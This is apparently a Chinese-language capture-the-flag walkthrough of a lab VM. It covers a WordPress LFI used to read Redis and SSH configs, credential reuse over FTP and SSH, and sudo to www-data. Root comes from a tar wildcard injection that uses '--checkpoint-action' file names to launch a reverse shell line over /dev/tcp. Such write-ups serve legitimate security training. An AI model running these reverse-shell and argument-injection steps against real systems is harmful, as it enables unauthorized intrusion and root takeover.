1. 信息收集与初期访问
-
端口扫描:开放了 21 (FTP)、22 (SSH)、80 (HTTP) 以及 6379 (Redis)。
-
FTP匿名:
lftp 192.168.56.194:~> cat note.txt
Hello team,Max here - the new sysadmin. After a quick analysis of the system, I've noticed a few inconsistencies left by the previous admin, particularly around some core services and their conf files. For now, I'd prefer not to touch anything too sensitive until I have a clearer picture.
I'm currently testing a site editor plugin a colleague recommended. The homepage is still empty while I sort things out, but it should be up soon.
For the time being, SSH access has been restricted to admin accounts only.
Please be patient, and apologies for any inconvenience. I'm working as quickly as possible to get everything back in order.
649 bytes transferred -
Web 漏洞利用 :使用
nuclei扫描发现 WordPress 插件存在 LFI (本地文件包含) 漏洞。 -
敏感文件读取 :
- 读取
/etc/redis/redis.conf:获取 Redis 密码washington - 读取
/etc/passwd:确认系统中存在用户mario和max - 读取
/etc/group:发现用户mario属于redis组 - 读取
/etc/ssh/sshd_config: 限制了AllowUsers max
- 读取
2. 身份切换 (Horizontal Movement)
- 密码复用 :使用 Redis 密码
washington进行喷洒,可以以系统用户mario的身份登录 FTP 。 - FTP 搜集 :
mario登录 FTP,虽然没有上传权限,但在/var/www/html/目录下发现了备份文件wp-configg.php.bak。- 下载并查看该文件,提取出数据库密码(推测为
max的系统密码):m92f21W86rrq。
- SSH 登录 :
- 直接使用
max:m92f21W86rrq通过 SSH 登录系统。
- 直接使用
3. 权限提升 (Privilege Escalation)
- 当前身份 :
max - sudo 权限检查 :
sudo -l显示max可以以www-data身份运行/bin/bash。- 执行:
sudo -u www-data /bin/bash切换到www-data。
- 执行:
4. 获取 Root
在 www-data 之后觉得"走不通",其实 /opt 目录下的 backup.sh 脚本是提权到 root 的关键。
脚本分析:
bash
#!/bin/bash
BACKUP_DIR="/root"
TARGET="/var/www/html"
mkdir -p $BACKUP_DIR
cd $TARGET
tar -czf $BACKUP_DIR/wordpress_backup.tar.gz *
- 漏洞点 :
tar命令在cd $TARGET(即/var/www/html)后使用了通配符*。 - 写权限 :作为
www-data,你对/var/www/html具有写权限。 - 触发机制 :如果该脚本是由 root 用户的定时任务(Cron Job)触发的,我们可以通过注入
tar的命令行参数来执行任意命令。
利用步骤:
在 www-data 的 shell 中执行:
bash
cd /var/www/html
# 1. 创建一个反弹 Shell 脚本
echo "bash -i >& /dev/tcp/你的IP/端口 0>&1" > shell.sh
chmod +x shell.sh
# 2. 创建特殊的通配符文件,使 tar 将其解析为参数
touch ./"--checkpoint=1"
touch ./"--checkpoint-action=exec=bash shell.sh"
原理:
当 root 执行 tar -czf ... * 时,通配符 * 会展开为当前目录下所有文件名。tar 会识别出其中的 --checkpoint=1 和 --checkpoint-action=exec=... 并将其作为功能参数执行,从而以 root 身份运行我们的 shell.sh。
等待定时任务触发(这里好像是立刻触发),攻击机即可收到来自 root 权限的反弹 Shell。
难点总结(Hard Points)
| 难点维度 | 现象 | 渗透逻辑 |
|---|---|---|
| FTP 权限 | 只有读权限,无法上传authorized_keys。 | 变"漏洞利用"为"信息搜集",寻找备份文件(.bak) |
| SSH 限制 | AllowUsers max 封锁了其他用户 |
必须找到 max 的凭据,这是初始访问的唯一通道 |
| 提权路径 | 常规 Redis 提权和 SUID 均不可用 | 审计自定义脚本,发现 root 运行的计划任务中存在 tar * 参数注入风险 |